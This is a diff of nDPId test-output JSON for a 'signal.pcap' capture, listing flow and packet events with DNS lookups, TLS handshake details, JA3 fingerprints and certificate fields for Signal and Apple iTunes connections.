+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247600,"flow_last_seen":1569051247600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247600,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569051247600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247600,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd67AbuyrbdxAAAAALAC\/\/+b2AAAAgQFtAEDAwcBAQgKKFVR7wAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247601,"flow_last_seen":1569051247601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569051247601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247601,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd68AbvGwW2DAAAAALAC\/\/\/RsAAAAgQFtAEDAwcBAQgKKFVR8AAAAAAEAgAA"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247603,"flow_last_seen":1569051247603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569051247603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247603,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd69Abtt2McPAAAAALAC\/\/\/RCgAAAgQFtAEDAwcBAQgKKFVR8gAAAAAEAgAA"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569051247630,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569051247630,"pkt":"xGGLNYKpxiwDYGpkCABFAABXR+wAAEARrUfAqAIBwKgCEQA17XkAQwp5yviBgAABAAEAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAA8ABBc5GBA="} 
00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051247630,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.57.24.16"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569051247643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247643,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73rrg+UqLaJ6n1qAScSCOEgAAAgQFrAQCCAqWTinBKFVR7gEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1569051247645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247645,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN66AbtonqfW4PlKjIAQBAspvwAAAQEICihVUhuWTinB"} 
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569051247704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247704,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG7wEr7fyfqQK3D1aASaN\/uCAAAAgQFrAQCCApkFVboKFVNgQEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569051247706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247706,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrcBKAbtArcPV+38n64AQCBZ9JQAAAQEICihVTfNkFVbo"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569051247709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247709,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73rtLEL7asq23cqASaN9\/CQAAAgQFrAQCCApkFVbqKFVR7wEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569051247711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247711,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd67AbuyrbdySxC+24AQBAsSOAAAAQEICihVUlpkFVbq"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73r1n96jrbdjHEKASaN+tQgAAAgQFrAQCCApkFVbrKFVR8gEDAwg="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G9nMi4fCtwKgCEQG73rwJHv1\/xsFthKASaN+4LQAAAgQFrAQCCApkFVbrKFVR8AEDAwg="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd69Abtt2McQZ\/eo7IAQBAtAbwAAAQEICihVUl9kFVbr"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd68AbvGwW2ECR79gIAQBAtLWAAAAQEICihVUl9kFVbr"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 
-00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open 
Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569051247643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247643,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73rrg+UqLaJ6n1qAScSCOEgAAAgQFrAQCCAqWTinBKFVR7gEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1569051247645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247645,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN66AbtonqfW4PlKjIAQBAspvwAAAQEICihVUhuWTinB"} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": 
